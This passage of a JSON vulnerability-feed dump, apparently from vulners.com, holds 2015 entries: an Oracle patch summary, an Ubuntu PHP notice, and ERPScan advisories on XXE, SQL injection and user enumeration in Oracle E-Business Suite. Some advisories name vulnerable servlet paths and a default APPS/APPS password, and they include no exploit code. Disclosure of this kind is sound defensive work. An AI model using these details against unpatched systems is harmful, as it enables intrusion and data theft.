"CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "PHAR extension DoS.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 